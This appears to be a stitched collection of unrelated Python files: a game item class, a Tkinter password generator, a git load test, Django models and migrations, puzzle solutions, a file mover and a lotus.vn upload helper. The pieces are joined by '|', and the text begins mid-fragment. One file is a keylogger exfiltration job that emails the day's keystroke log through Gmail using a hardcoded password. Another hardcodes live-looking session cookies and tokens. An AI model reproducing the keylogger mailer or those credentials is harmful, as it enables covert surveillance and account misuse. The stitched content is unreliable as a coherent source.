return {"all-week-long": find_allweeklong()}
|
from game.items.item import Hatchet
from game.skills import SkillTypes
class RuneHatchet(Hatchet):
name = 'Rune Hatchet'
value = 12800
skill_requirement = {SkillTypes.woodcutting: 41}
equip_requirement = {SkillTypes.attack: 50}
damage = 306
accuracy = 850 |
from Tkinter import *
import random
import string
import tkMessageBox
root=Tk()
root.geometry("300x400")
root.title("Password generator")
Label(root, text="Website: ").grid(row=0, sticky=W)
Label(root, text="Username: ").grid(row=1, sticky=W)
Label(root, text="Password: ").grid(row=2, sticky=W)
Label(root, text="Password Length: ").grid(row=3, sticky=W)
Label(root, text="Allowed Characters: ").grid(row=4, sticky=W)
# Create widgets
website_e = Entry(root, width=30)
username_e = Entry(root, width=30)
password_e = Entry(root, width=30)
len_e = Entry(root, width=3)
website_e.grid(row=0, column=1, sticky=W)
username_e.grid(row=1, column=1, sticky=W)
password_e.grid(row=2, column=1, sticky=W)
len_e.grid(row=3, column=1, sticky=W)
def create():
w=website_e.get()
u=username_e.get()
if w=="" or u=="":
tkMessageBox.showwarning("Warning","One of your Field is empty")
return
else:
tkMessageBox.showinfo("Congo","Password created succesfully")
def gen():
l=len_e.get()
l=int(l)
print("bhai meri lenth"+str(l) +" ")
allowed_classes = []
print("bhai allowed_classes"+str(allow_uppercase.get()))
if allow_uppercase.get() == 1:
allowed_classes.append(0)
if allow_lowercase.get() == 1:
allowed_classes.append(1)
if allow_numbers.get() == 1:
allowed_classes.append(2)
if allow_special.get() == 1:
allowed_classes.append(3)
print(allowed_classes)
charclass = [string.ascii_uppercase, string.ascii_lowercase, string.digits, '!$%@#']
pw = ""
for x in range(l):
c= int(random.choice(allowed_classes))
ch = random.choice(charclass[c])
pw += str(ch)
password_e.delete(0,END)
password_e.insert(0, pw)
allow_uppercase = IntVar()
allow_lowercase = IntVar()
allow_numbers = IntVar()
allow_special = IntVar()
uppercase_chk = Checkbutton(root, text="Uppercase letters (A-Z)", variable=allow_uppercase,onvalue=1)
lowercase_chk = Checkbutton(root, text="Lowercase letters (a-z)", variable=allow_lowercase,onvalue=1)
numbers_chk = Checkbutton(root, text="Numbers (0-9)", variable=allow_numbers,onvalue=1)
special_chk = Checkbutton(root, text="Special characters (!$%@#)", variable=allow_special,onvalue=1)
uppercase_chk.grid(row=4, column=1, sticky=W)
lowercase_chk.grid(row=5, column=1, sticky=W)
numbers_chk.grid(row=6, column=1, sticky=W)
special_chk.grid(row=7, column=1, sticky=W)
create_btn = Button(root, text="Create",command=create).grid(row=9, column=1,pady=25,padx=20)
generate_btn = Button(root, text="Generate Password",command=gen).grid(row=8, column=1,pady=10)
back_btn = Button(root, text="Back",command=root.destroy).grid(row=8, column=0)
root.mainloop()
|
#!/usr/bin/python -u
""" git threading hammer test """
import os
from multiprocessing import Pool, log_to_stderr
import logging
import tempfile
from shutil import rmtree
import subprocess
from time import sleep
from random import random
import itertools
import traceback
import sys
import logging
try:
from tendo import colorer
except:
pass
LOGGER = log_to_stderr()
LOGGER.setLevel(logging.WARN)
logging.basicConfig(level=logging.INFO)
# --- CONFIG START ---
REPO_SSH = "ssh://git@gitlab.citrite.net/craigem/testing.git"
REPO_HTTP = "http://gitlab.citrite.net/craigem/testing.git"
PROCS = 10
# --- CONFIG END ---
REPOS = [REPO_HTTP]
SSH_ERROR_CODE = 128
SSH_ERROR = "ssh_exchange_identification: Connection closed by remote host"
def ssh_safe_clone(repo, dname):
""" catch ssh errors """
tried = 0
while True:
proc = subprocess.Popen(["git", "clone", repo, dname], stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, stdin=open(os.devnull))
out = proc.communicate()[0]
ret = proc.returncode
tried += 1
if ret != SSH_ERROR_CODE or SSH_ERROR not in out or tried == 100:
return (ret, out)
sleep(0.5)
def clone(repo, remove=True):
""" clone something """
dname = tempfile.mkdtemp(dir=os.path.join(tempfile.gettempdir(),'loadtest'))
delay = 3.0 * random() # 0-3 seconds random delay
#LOGGER.warn("In %0.3f seconds I'll clone %s into %s", delay, repo, dname)
sleep(delay)
(ret, out) = ssh_safe_clone(repo, dname)
present = os.path.isdir(dname)
if ret == 0:
if present:
msg = "worked"
else:
msg = "missing"
else:
msg = "failed (ret = %s)\n%s" % (ret, out)
#LOGGER.warn("Cloning %s into %s %s", repo, dname, msg)
if remove and present:
rmtree(dname)
return (ret, out, dname)
def clone_and_push_in_loop(repo):
try:
(ret,out,dpath) = clone(repo, remove=False)
logging.info("Starting writable repo %s in %s ..." % (repo, dpath))
if ret != 0:
raise Exception("Fatal error on writable thread %s => %s: %s" % (repo, dpath, out))
while True:
# appending one line to a text file
f = open(os.path.join(dpath, 'sample.txt'), "a")
f.write("bla bla made from %s \n" % dpath)
f.close
sleep(1)
#proc = subprocess.Popen(["ls","-l"], stdout=subprocess.PIPE,
# stderr=subprocess.STDOUT, stdin=open(os.devnull), cwd=dpath)
#(out,outerr) = proc.communicate()
#ret = proc.returncode
#logging.info("%s : %s : %s" % (ret, out, outerr))
proc = subprocess.Popen(["git", "commit", "-v", "-a", "-m", "somechange"], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, stdin=open(os.devnull), cwd=dpath, shell=True)
(out,outerr) = proc.communicate()
ret = proc.returncode
logging.info("Commit: %s : %s : %s" % (ret, out, outerr))
if ret:
raise Exception("commit failed!: %s" % out)
# pushing
proc = subprocess.Popen(["git", "push"], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, stdin=open(os.devnull), cwd=dpath, shell=True)
(out,outerr) = proc.communicate()
ret = proc.returncode
logging.info("Push: %s : %s : %s" % (ret, out, outerr))
if ret:
raise Exception("push failed: %s" % out)
sleep(2)
logging.info("Before cleanup...")
rmtree(dpath)
logging.info("Writable loop ended normally?")
except Exception as e:
logging.error("Failed with %s" % e)
def main():
""" main """
logging.info("Starting writing thread...")
testdir = os.path.join(tempfile.gettempdir(),'loadtest')
wp = Pool(1)
result = wp.map_async(clone_and_push_in_loop, [REPO_SSH] * 1)
sleep(5)
logging.info("Starting the load test on %s threads..." % PROCS)
try:
os.mkdir(testdir)
except:
pass
try:
for repo in REPOS:
p = Pool(PROCS)
result = p.map_async(clone, [repo] * PROCS)
failed = len(list(itertools.ifilter(lambda r: r[0] != 0, result.get(999999)))) # see http://stackoverflow.com/a/1408476/99834
print "%s / %s failed" % (failed, PROCS)
p.close()
p.join()
except Exception as e:
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback,
limit=2, file=sys.stdout)
#traceback.print_tb(e)
#logging.error(e)
print e
try:
os.removedirs(testdir)
except:
pass
wp.close
wp.join
if __name__ == "__main__":
main()
|
from . import views
from django.urls import path
app_name="Myapp"
urlpatterns = [
path('', views.index, name="index"),
path('learn', views.learn ,name="learn"),
path('codeform', views.codeform, name="codeform"),
path('pro', views.pro ,name="pro"),
path('compare', views.compare,name="compare"),
] |
""" This program solves ProjectEuler problem 44, which asks the following:
If pentagonal numbers are of the form n(3n-1)/2, find the difference D
between the pair of numbers P1 and P2 that minimize D and satisfies:
P1 and P2 are pentagonal, and so is their sum and their difference.
My first program was too slow, but found a pair satisfying the condition which had
a difference of just under 6,000,000 (but couldn't say it was the smallest).
This improved program uses the fact that the answer cannot be > 6 million.
The algorithm starts out by computing a list of pentagonals that is sufficiently
long, as well as a set of pentagonals which can be used to check if a number is
pentagonal, and which goes high enough to contain sums of pentagonals.
After this, the list of pentagonals is searched for pairs satisying
the criteria, only checking pairs with difference < 6 million.
After all pairs are checked, the lowest difference is reported.
runs in ~10 seconds on my computer"""
pentagonals = [1,5,12]
pentset = {1,5,12}
answer = 0
i=4
y=4
last = 12
Upper_bound = 6000000
while (True): # This first loop generates the list and set of pentagonals
pentagonals.append(int(i*(3*i-1)/2))
while last <= (pentagonals[-2]+pentagonals[-1]):
last = int(y*(3*y-1)/2)
pentset.add(last)
y+=1
if pentagonals[-1]-pentagonals[-2] > Upper_bound:
break
i+=1
for j in range(len(pentagonals)-1): # This loop checks all pairs with difference <6,000,000 and saves candidate answers
k=j+1
while(pentagonals[k]-pentagonals[j]< Upper_bound):
if int(pentagonals[k]-pentagonals[j]) in pentset and int(pentagonals[k]+pentagonals[j]) in pentset and (answer==0 or (pentagonals[k]-pentagonals[j])<answer):
answer = int(pentagonals[k]-pentagonals[j])
if k ==len(pentagonals)-1:
break
k+=1
print(answer)
|
### import
import datetime
import pytest
from quizzer.models.quiz import Quiz, QuizQuestion, QuizQuestionChoice
### test Quiz
def test_good_quiz(class_, teacher):
quiz = Quiz(
name=u'Object-oriented data structure design',
class_=class_,
percentage=100,
owner=teacher,
questions=[
QuizQuestion(
text=u'What design fits better for Quiz.questions?',
choices=[
QuizQuestionChoice(text=u'Document-oriented', is_correct=True),
QuizQuestionChoice(text=u'Relational'),
QuizQuestionChoice(text=u'Any other, fast and simple enough', is_correct=True),
QuizQuestionChoice(text=u'Whatever'),
],
),
],
)
assert hasattr(quiz, 'created')
assert isinstance(quiz.created, datetime.datetime)
assert 0 <= (datetime.datetime.utcnow() - quiz.created).total_seconds() < 1
# Skipping other tests of abstract base Model here, see Teacher tests.
### also test custom validation feature of abstract base Model
def test_bad_quiz_question_type(class_, teacher):
with pytest.raises(TypeError) as e:
quiz = Quiz(
name=u'Object-oriented data structure design',
class_=class_,
owner=teacher,
questions=[True],
)
assert '''"Quiz" requires type of field "questions[0]" to be <class 'quizzer.models.quiz.QuizQuestion'>, not <type 'bool'>''' in str(e)
def test_bad_quiz_question_choice_type(class_, teacher):
with pytest.raises(TypeError) as e:
quiz = Quiz(
name=u'Object-oriented data structure design',
class_=class_,
owner=teacher,
questions=[
QuizQuestion(
text=u'What design fits better for Quiz.questions?',
choices=[True],
),
],
)
assert '''"QuizQuestion" requires type of field "choices[0]" to be <class 'quizzer.models.quiz.QuizQuestionChoice'>, not <type 'bool'>''' in str(e)
|
import schedule
import time
def job():
import sqlite3
con2=sqlite3.Connection('Email')
cur2=con2.cursor()
cur2.execute('select * from email')
recipient_email=cur2.fetchall()
sender_email='divyanshsengarjuet@gmail.com'
password='26060000'
import smtplib
date=time.localtime().tm_mday,time.localtime().tm_mon,time.localtime().tm_year
today=str(date[0])+'-'+str(date[1])+'-'+str(date[2])
f=open('C:/Users/divyansh/Desktop/Keylogger/LOG FILES/'+today+'.txt','r')
text='Keylog file\n'+f.read()
server=smtplib.SMTP_SSL('smtp.gmail.com',465)
server.login(sender_email,password)
server.sendmail(sender_email,
recipient_email[0][0],
text)
server.quit()
time.sleep(300)
job()
##try:
## job()
##except FileNotFoundError:
## schedule.every().day.at('00:00:10').do(job)
##while 1:
## schedule.run_pending()
## time.sleep(1)
|
from flask import Flask, render_template, request, session
from flask import redirect, url_for
import utils
app = Flask(__name__)
@app.route("/")
@app.route("/home")
def home():
return render_template('home.html')
@app.route("/login", methods = ["GET", "POST"])
def login():
if "logged" not in session:
session["logged"] = False
if request.method=="GET":
return render_template("login.html")
else:
uname = request.form['username']
pword = request.form['password']
button = request.form['button']
if button=="cancel":
return render_template("login.html")
if utils.authenticate(uname,pword):
session["logged"] = True
return redirect(url_for("success"))
else:
error = 'INVALID IDENTIFICATION, ABORT SITE!!!'
return render_template("login.html",err=error)
@app.route("/success")
def success():
if "logged" not in session:
session["logged"] = False
if not session["logged"]:
return redirect(url_for("login"))
else:
return render_template("success.html")
@app.route("/logout")
def logout():
session["logged"] = False
return redirect(url_for("login"))
if __name__ == "__main__":
app.debug = True
app.secret_key = "get herbed"
app.run(host='0.0.0.0',port=8000)
|
from src.domain.environments.real_world_environment import RealWorldEnvironment
from src.domain.environments.vision_environment import VisionEnvironment
from src.domain.objects.target_zone import TargetZone
from src.vision.coordinate_converter import CoordinateConverter
class RealWorldEnvironmentFactory(object):
def __init__(self, coordinate_converter: CoordinateConverter):
self.coordinate_converter = coordinate_converter
def create_real_world_environment(self, vision_environment: VisionEnvironment) -> RealWorldEnvironment:
obstacles = self.coordinate_converter.project_obstacles_from_pixel_to_real_world(vision_environment.obstacles)
cubes = self.coordinate_converter.convert_vision_cubes_to_real_world_environment_cubes(vision_environment.cubes)
target_zone = TargetZone(66.2)
return RealWorldEnvironment(obstacles, cubes, target_zone)
|
import time
class ProfileStats:
_instance = None
@staticmethod
def instance():
if ProfileStats._instance is None:
ProfileStats._instance = ProfileStats()
return ProfileStats._instance
@staticmethod
def add(profile_time):
ProfileStats.instance()._add(profile_time)
@staticmethod
def print_stats():
ProfileStats.instance()._print_stats()
def __init__(self):
self.profilers = {}
def _add(self, profile_time):
if profile_time.id not in self.profilers:
self.profilers[profile_time.id] = []
self.profilers[profile_time.id].append(profile_time)
def _print_stats(self):
if not self.profilers:
return
print(f'{"-"*7} PROFILER {"-"*7}')
for k, profile_list in self.profilers.items():
middle = 0
r = []
for p in profile_list:
middle += p.result
r.append(p.result)
middle /= len(profile_list)
print(f'[{k}] middle: {round(middle, 3)} {str(r)}')
print(f'|{"_"*10}profiler{"_"*10}|')
class ProfileTime(object):
def __init__(self, id, msg=None):
self.msg = msg
self.id = id
self.__start = time.time()
self.result = -1
def stop(self):
self.result = round(time.time() - self.__start, 3)
ProfileStats.add(self)
def __enter__(self):
pass
def __exit__(self, *_):
self.stop() |
from django.db import models
from django.contrib.auth.models import User
from django.core.validators import MinValueValidator
class Car(models.Model):
owner = models.ForeignKey(User, on_delete=models.CASCADE, related_name='cars',)
brand = models.CharField(max_length=100)
model = models.CharField(max_length=100)
register_plate = models.CharField(max_length=100)
consumption = models.DecimalField(max_digits=4, decimal_places=2, null=True, validators=[MinValueValidator(0.01)]) #liters per 100 km
def __str__(self):
return "User: " + str(self.owner.id) + " car " + self.register_plate |
#!/usr/bin/python
def nested(l):
if not l:
return 1
count = 1
for item in l:
if type(item) is list:
count = 1 + nested(item)
return count
print(nested([])) |
# Generated by Django 3.0.3 on 2020-08-06 15:10
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('weekly', '0001_initial'),
]
operations = [
migrations.RenameModel(
old_name='Agents',
new_name='Agent',
),
migrations.RenameModel(
old_name='AgentShifts',
new_name='AgentShift',
),
migrations.RenameModel(
old_name='Shifts',
new_name='Shift',
),
]
|
#I have tested this code for winows and it works please chech it for other systems
#
# where ever you see C:\\Users\\Nathaniel\\Dropbox\\code change it and put the path to your dropbox
#
# this was the path for my dropox therefor it may not work for you
#
#i have a common place where i store all my projects locally that location is E:\\code\\codes\\"
#
#please replace that location with your computer
#
#
#
#
#
#
#
#
import os
import shutil
print("import \nexport \nexit")
choice=input()
while(choice != "exit"):
if(choice == "import"):
os.system("cls")
dir_dst = "C:\\Users\\Nathaniel\\Dropbox\\code"
project_name = input("project name:- ")
if(project_name == "exit()"):
exit()
temp_dir_src = "E:\\code\\codes\\"
dir_src = temp_dir_src + project_name
dest_folder_name = "C:\\Users\\Nathaniel\\Dropbox\\code\\" + project_name
os.mkdir(dest_folder_name)
for file in os.listdir(dir_src):
print(file)# testing
src_file = os.path.join(dir_src, file)
dst_file = os.path.join(dir_dst, file)
shutil.move(src_file, dest_folder_name)
print("transfer complete")
print("import \nexport \nexit")
choice=input()
#
#dir_src = the initial places where the file is located along with the project name
#dir_dst = has the directory destination without the project name
#dest_folder_name = has te destanation path along with the project name
def trans(src_dir, dest_dir , dest_dir_pro):
src_dir = dir_src
dest_dir= dir_dst
dest_dir_pro = dest_folder_name
os.mkdir(dest_folder_name)
for file in os.listdir(dir_src):
print(file)# testing
src_file = os.path.join(dir_src, file)
dst_file = os.path.join(dir_dst, file)
shutil.move(src_file, dest_folder_name)
print("transfer complete")
#
#
#if(choice == "export"):
# os.system("cls")
# dir_dst = "C:\\Users\\Nathaniel\\Dropbox\\code"
# project_name = input("project name:- ")
# temp_dir_src = "E:\\code\\codes\\"
# dir_src = temp_dir_src + project_name
# dest_folder_name = "C:\\Users\\Nathaniel\\Dropbox\\code\\" + project_name
# os.mkdir(dest_folder_name)
# for file in os.listdir(dir_src):
# print(file)# testing
# src_file = os.path.join(dir_src, file)
# dst_file = os.path.join(dir_dst, file)
# shutil.move(src_file, dest_folder_name)
# print("transfer complete")
#
#
# os.system("cls")
# project_name = input("Project name:- ")
# temp_dir_dest = "E:\\code\\codes\\" + project_name
# os.mkdir(temp_dir_dest)
#
#
# src_folder_name = "C:\\Users\\Nathaniel\\Dropbox\\code\\" + project_name
# for file in os.listdir(dir_src):
# print(file)# testing
# src_file = os.path.join(dir_src, file)
# dst_file = os.path.join(dir_dst, file)
# shutil.move(src_file, dest_folder_name)
# print("transfer complete")
#
#if(choice == "export"):
# os.system("cls")
# project_name = input("project name:- ")
# dir_src = "C:\\Users\\Nathaniel\\Dropbox\\code"
# temp_dir_dst = "E:\\code\\codes\\"
# dir_dest = "E:\\code\\codes\\" + project_name
# os.mkdir(dir_dest)
#
#
# #dir_src = temp_dir_src + project_name
# #dest_folder_name = "C:\\Users\\Nathaniel\\Dropbox\\code\\" + project_name
# #os.mkdir(dir_dest)
# for file in os.listdir(dir_src):
# print(file)# testing
# src_file = os.path.join(dir_src, file)
# dst_file = os.path.join(dir_dst, file)
# shutil.move(src_file, dir_dest)
# print("transfer complete")
if(choice=="export"):
os.system("cls")
project_name = input("Project name:- ")
if(project_name == "exit()"):
exit()
dir_src = "C:\\Users\\Nathaniel\\Dropbox\\code\\" + project_name
dir_dst = "E:\\code\\codes\\"
dest_folder_name = "E:\\code\\codes\\" + project_name
#trans(src_dir,dest_dir,dest_dir_pro)
os.mkdir(dest_folder_name)
for file in os.listdir(dir_src):
print(file)# testing
src_file = os.path.join(dir_src, file)
dst_file = os.path.join(dir_dst, file)
shutil.move(src_file, dest_folder_name)
print("transfer complete")
print("import \nexport \nexit")
choice=input()
|
class Solution:
# dynamic programming
def longestPalindrome0(self, s):
"""
:type s: str
:rtype: str
"""
# store bool of i ,j as a palindrome from i to j.
# cannot use i to indicate the center
# there exists even cases
dp = [[False,] * len(s) for i in range(len(s))]
length = len(s)
for i in range(length):
dp[i][i] = True
max = 0
ret = s[0]
for i in range(length -1 , -1 , -1):
for j in range(i, length):
# print(i, j)
dp[i][j] = (j - i < 3 or dp[i+1][j-1]) and s[i] == s[j]
# print("%d %d %s"%(i ,j ,str(dp[i][j])))
if dp[i][j]:
if j - i + 1 > max:
ret = s[i:j+1]
max = j - i + 1
print(ret)
return ret
# Manacher
def longestPalindrome(self, s):
"""
:type s: str
:rtype: str
"""
# make the string to odd length
tmp = s
s = "#" + "".join([c + "#" for c in s])
# print(s)
i = mx = 0
mid = 0
max = 0
# length = [0,] * len(s)
length = []
for k in range(len(s)):
import pdb
# pdb.set_trace()
if k < mx:
j = 2 * mid - k
tmp_l = length[j]
count = min(tmp_l, mx - i)
left = k - tmp_l
right = k + tmp_l
for t in range(1, min(left + 1, len(s) - right)):
if s[right + t] == s[left - t]:
count += 1
else:
break
length.append(count)
else:
count = 0
for t in range(1, min(len(s) - k, k + 1)):
if s[k + t] == s[k - t]:
count += 1
else:
break
length.append(count)
if length[k] > max:
max = length[k]
mx = k + length[k]
mid = k
ret = s[k - max:k + max + 1]
# print(k)
# print(length[k])
print(ret)
print(length)
return ret.replace("#", "")
s = Solution()
print(s.longestPalindrome('babad'))
|
from flask import Blueprint, Flask,redirect, session, g, render_template, url_for,request, send_from_directory ,Response #imports
import requests
import os
import sys
from flask_celery import make_celery
from flask_pymongo import PyMongo
import random
from random import choice,randint
import time
import datetime
from multiprocessing.pool import ThreadPool
from pydrive.auth import GoogleAuth
from pydrive.drive import GoogleDrive
from pydrive.files import GoogleDriveFile
from os import path
from multiprocessing.pool import ThreadPool
import io
from apiclient import errors
from apiclient import http
import json
from bson.objectid import ObjectId
from requests_toolbelt import MultipartEncoder
import filetype
def getUserInfo():
header={"Cookie":"_kh_d_guid=892466748f4544f5e6fcfea6074bf76b; lotus=CfDJ8Dq0dlIYuJNOgmJyXTgyxclwVdrWqIfgqvG-42_w84Nyx-9cLLKI_hhdtkOkvBFOkoh-OkHTb8FTkV0715e4AYup0EIL_hITIwxDPfUyBLyp0kXKz_xQkhR1lZl3HrepLWPfrpR5zpWFz9nOAoaKxXCMbfSvAw3Z_o2USsXzNYQlcPIcJZc2XMNbyERY02yx2R7C4seYq0LKhvHLqiSLukZE7A3gNdVjXOnzXe-vzjdrdXQhMuXcgHDbZzKGG6ZHVXJF_W_5k-OVB3_qAXOkDRF6n2WgXljTMUILlbk23sD_BKGB9DKw4ViDnveHJzpcf3Y-BA-wp14hRdeOp8RFsUYmqJEaDCXgB9uibtKjLeHWhfyifJRASWkD18Yg0DkDiSDNl2KwWgxPlZgJHPcZsxGVBtCo_J5DKQcPME-3r3cX7v_nFTCmb5IQbZsjp5_fKCbyBTJtoVWtG33hMMGw8oozxByYGe9YkUIlWljKog6OHwApz6fCC0HiNeHBPiAK3NBK6c_Wu9DAbN3pct3MFcC7EkUetp3ZrGft7qOiX4mMytWofr7wI4T4IUIA9PNDMDGE6WCqWxYvCp1EpV0uvlf4SNGWMp29XW8aJ3bm3JMu1mxHy7CA6F5IkpKkxddCvoYu6VLb3dPfHNJmEIdzHQf7OqxRU1vciUzvvHUU4suncQPcoqomnZq9Zoswf54N-eMXIPi28M_4KRzX8bNcAjN-uihmPITW3oMkPr2AA3QVEUlK3LDS8SZfPwCvZmnlGyJKmqQXnExQ3YoDkdWHpmg5BoXuD1Pr5LZpBKM5ORbcoZI2KagZj2JYVDCWAJx-5xCBmg5qdQbKlgqdZPFx8VHeiV9q3nz_KhFHYgqiT8t93EaW4pPPnZonVeXqCapugWX_g_Km1nxrcJIVDqTVuQXyEXVriY2haIpwDszt1zA__xvXnw2mBzIiNszzblbaJy3bXzGSeTYUiV2MO5ExOf-xnZH1uxwr1OR7Ry4U0BZJz4tP9kVhaGQcR3suhzuekoxdfm3-sRcqiic_QUiHQvVFpzTNgvmEp-PnceN6301HQA7Eo4W8xMlTymUBsrZlBytJlIC_uXTWUq_ULEcNmMveWX30DWxyt0WuH3jDqm34py8AC7D5pK4Ih0URPa5nVxh1xW6UY16nOQ0aYCJPVvb-_9QK4TxoevPtMzSmxf1XL1BnD0aFQt8HzSyvp3frvojcySKC7hZfD6Pa7miV_V3Y6-TRM4wbYOV4UKHX39PVM2DmLuHv-zTHcMrQbAFW_xMMXRYyu4RM_QzjUXAZqhq5_G5TFbaYuIdYRIb3xu69EirqOqwnNATS_4w_tPZ9Hlf1yI_to1i4ZnjKvHmLtpcdXdshCRuh03qXfwwkYNsf_6j8G7i7b3DFaFGpHHpJ_9M5vmQ52PT-liztubVZa0bcR1NElfdnoZV3kTx8ocA8IXXXUwl35ztr_Ybo3e-mBf1LBZ3gh98zEad8M6lYxORNkJ8LQtAvHgV-xm-eWWtafpTWVtekRb42tRINnibbP_0gKeFJxe6hX2oh4Sqf9WISB67isnFWXULTwurC6YkcqkHXoh0n_F9GxujwUZ_CMDUIjWspozPS3uNdL-EL6YiF9p5P7QkvXVht0NbkzrXq; _lt_sd=PwdfIiFSBSsbFh4VKQk8UDlRRGtFKFElQD8FWRM/PBEYWxxzS0RXJlgECgtnbHATeBYTIgIUaTldUlFbcWJiBWQCX2JXVAZgDkFYQXN0fhMnURUiDglYOV1SUVsjMGICZgJTYgYHAGlfFAlMdW4zBTUDAjdRVwcxXEZcQHVmYgFkBVFjAgcGZQhHXB1nKw==; __admUTMtime=1598859448; _kh_t_e_a_s=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnYXRld2F5MSIsImF1ZCI6WyJ3ZWJraW5naHViIiwid2Via2luZ2h1YiJdLCJyb2xlIjoibWVtYmVyIiwiZXhwIjoxNTk4ODYwMDczLCJpYXQiOiIyMDIwLTA4LTMxIDE0OjM3In0.glZaFd_fcxlRQKPNt4EvewRhyfInMgHxYksy2BAtaGM"}
response = requests.post("https://lotus.vn/w/authenticate/getuserinfo",headers=header)
metadata = response.json()["data"]
#print(metadata)
return {"user_id":metadata["user_id"],"sessionid":metadata["sessionid"],"type":metadata["type"]}
def gtk():
header={"Cookie":"_kh_d_guid=892466748f4544f5e6fcfea6074bf76b; lotus=CfDJ8Dq0dlIYuJNOgmJyXTgyxclwVdrWqIfgqvG-42_w84Nyx-9cLLKI_hhdtkOkvBFOkoh-OkHTb8FTkV0715e4AYup0EIL_hITIwxDPfUyBLyp0kXKz_xQkhR1lZl3HrepLWPfrpR5zpWFz9nOAoaKxXCMbfSvAw3Z_o2USsXzNYQlcPIcJZc2XMNbyERY02yx2R7C4seYq0LKhvHLqiSLukZE7A3gNdVjXOnzXe-vzjdrdXQhMuXcgHDbZzKGG6ZHVXJF_W_5k-OVB3_qAXOkDRF6n2WgXljTMUILlbk23sD_BKGB9DKw4ViDnveHJzpcf3Y-BA-wp14hRdeOp8RFsUYmqJEaDCXgB9uibtKjLeHWhfyifJRASWkD18Yg0DkDiSDNl2KwWgxPlZgJHPcZsxGVBtCo_J5DKQcPME-3r3cX7v_nFTCmb5IQbZsjp5_fKCbyBTJtoVWtG33hMMGw8oozxByYGe9YkUIlWljKog6OHwApz6fCC0HiNeHBPiAK3NBK6c_Wu9DAbN3pct3MFcC7EkUetp3ZrGft7qOiX4mMytWofr7wI4T4IUIA9PNDMDGE6WCqWxYvCp1EpV0uvlf4SNGWMp29XW8aJ3bm3JMu1mxHy7CA6F5IkpKkxddCvoYu6VLb3dPfHNJmEIdzHQf7OqxRU1vciUzvvHUU4suncQPcoqomnZq9Zoswf54N-eMXIPi28M_4KRzX8bNcAjN-uihmPITW3oMkPr2AA3QVEUlK3LDS8SZfPwCvZmnlGyJKmqQXnExQ3YoDkdWHpmg5BoXuD1Pr5LZpBKM5ORbcoZI2KagZj2JYVDCWAJx-5xCBmg5qdQbKlgqdZPFx8VHeiV9q3nz_KhFHYgqiT8t93EaW4pPPnZonVeXqCapugWX_g_Km1nxrcJIVDqTVuQXyEXVriY2haIpwDszt1zA__xvXnw2mBzIiNszzblbaJy3bXzGSeTYUiV2MO5ExOf-xnZH1uxwr1OR7Ry4U0BZJz4tP9kVhaGQcR3suhzuekoxdfm3-sRcqiic_QUiHQvVFpzTNgvmEp-PnceN6301HQA7Eo4W8xMlTymUBsrZlBytJlIC_uXTWUq_ULEcNmMveWX30DWxyt0WuH3jDqm34py8AC7D5pK4Ih0URPa5nVxh1xW6UY16nOQ0aYCJPVvb-_9QK4TxoevPtMzSmxf1XL1BnD0aFQt8HzSyvp3frvojcySKC7hZfD6Pa7miV_V3Y6-TRM4wbYOV4UKHX39PVM2DmLuHv-zTHcMrQbAFW_xMMXRYyu4RM_QzjUXAZqhq5_G5TFbaYuIdYRIb3xu69EirqOqwnNATS_4w_tPZ9Hlf1yI_to1i4ZnjKvHmLtpcdXdshCRuh03qXfwwkYNsf_6j8G7i7b3DFaFGpHHpJ_9M5vmQ52PT-liztubVZa0bcR1NElfdnoZV3kTx8ocA8IXXXUwl35ztr_Ybo3e-mBf1LBZ3gh98zEad8M6lYxORNkJ8LQtAvHgV-xm-eWWtafpTWVtekRb42tRINnibbP_0gKeFJxe6hX2oh4Sqf9WISB67isnFWXULTwurC6YkcqkHXoh0n_F9GxujwUZ_CMDUIjWspozPS3uNdL-EL6YiF9p5P7QkvXVht0NbkzrXq; _lt_sd=PwdfIiFSBSsbFh4VKQk8UDlRRGtFKFElQD8FWRM/PBEYWxxzS0RXJlgECgtnbHATeBYTIgIUaTldUlFbcWJiBWQCX2JXVAZgDkFYQXN0fhMnURUiDglYOV1SUVsjMGICZgJTYgYHAGlfFAlMdW4zBTUDAjdRVwcxXEZcQHVmYgFkBVFjAgcGZQhHXB1nKw==; __admUTMtime=1598859448; _kh_t_e_a_s=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnYXRld2F5MSIsImF1ZCI6WyJ3ZWJraW5naHViIiwid2Via2luZ2h1YiJdLCJyb2xlIjoibWVtYmVyIiwiZXhwIjoxNTk4ODYwMDczLCJpYXQiOiIyMDIwLTA4LTMxIDE0OjM3In0.glZaFd_fcxlRQKPNt4EvewRhyfInMgHxYksy2BAtaGM"}
response = requests.get("https://lotus.vn/w/a/gtk",headers=header)
metadata = response.json()["data"]
auth_key = getAuthentication(response.headers["set-cookie"])
metadata["auth_key"] = auth_key
#print(metadata)
return metadata
def getAuthUserInfo(auth_key,sessionid,user_id):
header={"Authorization":"Bearer "+auth_key,"session-id":sessionid}
response = requests.get("https://webpub.lotuscdn.vn/api/webkinghub/kinghub-user/get-auth-userinfo?user_id="+user_id,headers=header,verify=False)
data = response.json()
return data
def getAuthentication(cookie):
init = cookie.find("=")
end = cookie.find(";")
return cookie[init+1:end]
def getToken(auth_key,sessionid,user_id):
header={"Authorization":"Bearer "+auth_key,"session-id":sessionid}
response = requests.post("https://webpub.lotuscdn.vn/api/social/token",headers=header,data={"userId":user_id},verify=False)
data = response.json()
print(data)
return data
def kinghubPolicy(auth_key,api_key,sessionid,filename):
header={"Authorization":"Bearer "+auth_key,"session-id":sessionid,"API-Authorization":api_key}
response = requests.get("https://webpub.lotuscdn.vn/api/webkinghub/kinghub-policy?filename="+filename+"&convert=true",headers=header,verify=False)
data = response.json()
print(data)
return data
def generateFilename(file):
ts = int(time.time()*1000)
string = get_random_string()
#file_metadata = filetype.guess(file)
#if file_metadata:
# return str(ts)+"-"+string+"."+file_metadata.extension
#else:
return str(ts)+"-"+string+".mp4"
def lotusAuth(filename):
auth_key = gtk()["auth_key"]
user_data = getUserInfo()
sessionid = user_data["sessionid"]
user_id = user_data["user_id"]
api_key = getToken(auth_key,sessionid,user_id)["access_token"]
print(filename)
policy = kinghubPolicy(auth_key,api_key,sessionid,filename)["policy"]
return {"policy":policy["encoded_policy"],"filename":filename,"signature":policy["signature"],"sessionid":sessionid,"api_key":api_key,"auth_key":auth_key}
